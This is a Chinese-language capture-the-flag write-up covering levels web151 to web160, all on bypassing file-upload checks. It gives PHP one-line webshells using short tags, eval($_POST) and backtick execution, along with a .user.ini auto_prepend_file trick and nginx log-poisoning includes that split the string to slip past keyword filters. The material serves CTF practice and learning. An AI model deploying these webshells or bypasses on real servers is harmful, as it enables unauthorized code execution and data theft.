web151 JS前端绕过
直接上传 png的图片马
然后抓包修改为php
a=system("ls /var/www/html");
a=system("cat /var/www/html/flag.php");
web152
和151一样的方法也可以实现上传
a=system("ls /var/www/html");
a=system("cat /var/www/html/flag.php"); 
web153 .user.ini
用之前的方式无法上传 我们使用其他后缀名看看
但是无法解析 访问就直接下载了 这个时候 我们可以使用 .user. ini
因为服务器是 nginx所以可以使用
auto_prepend_file = easy.png解析 easy.png
先上传 user 发现有前端 那么我们就修改为 png
然后直接上传 easy.png
因为我们访问 upload目录的时候 会显示
说明存在index.php首页
所以我们通过 .user.ini 将 easy.png 类似 include进 index.php
进行解析 这样就会访问到我们的一句话木马
然后 我们访问/upload/index.php
a=system("ls /var/www/html");
a=system("cat /var/www/html/flag.php");
web154 判断内容检测 ,短标签
这里只是上传 png就报错
说明存在内容检测 多半是php格式的检测
我们可以使用其他的
<?= eval($_POST[1]);?>
<? eval($_POST[1]);?>
<% eval($_POST[1]);%> 
那我们看看能不能还可以使用 .user.ini
依然可以
web155
使用上面的方法还是可以
web156 对 [] 的过滤 (内容检测)
发现又对内容进行过滤了
经过排查 发现是对 [] 进行过滤了 所以我们直接使用 {}即可绕过
<?= eval($_POST{1});?>
然后配合 user.ini 执行命令
web157 过滤[] {} ;
这里我们可以发现 操作步骤和上面一样 但是在传犸的时候无法实现
经过一直删 发现 【】 {} ;
全被过滤了 那么木马就没办法了 但是可以通过短标签来执行system命令
<?=
system(ls)
?>
<?=
system('nl ../f*')
?>web158
和上面一样 可以直接读取
web159 过滤() 使用内联执行
这里发现()也不好使了
我们可以使用`` 来执行命令
<?= `nl ../f*`?>web160
这里发现内联也无法实现了
我们想想看能不能直接包含日志 然后通过日志进行文件上传
发现无法实现
<?=include"/var/log/nginx/access.log"这里我们开始删去内容 然后看看什么被过滤了 最后发现是log被过滤了
然后我们思考这里是传入字符串 所以可以通过 点 绕过
<?=include"/var/lo"."g/nginx/access.lo"."g"成功上传
成功了 我们在ua上写入木马即可
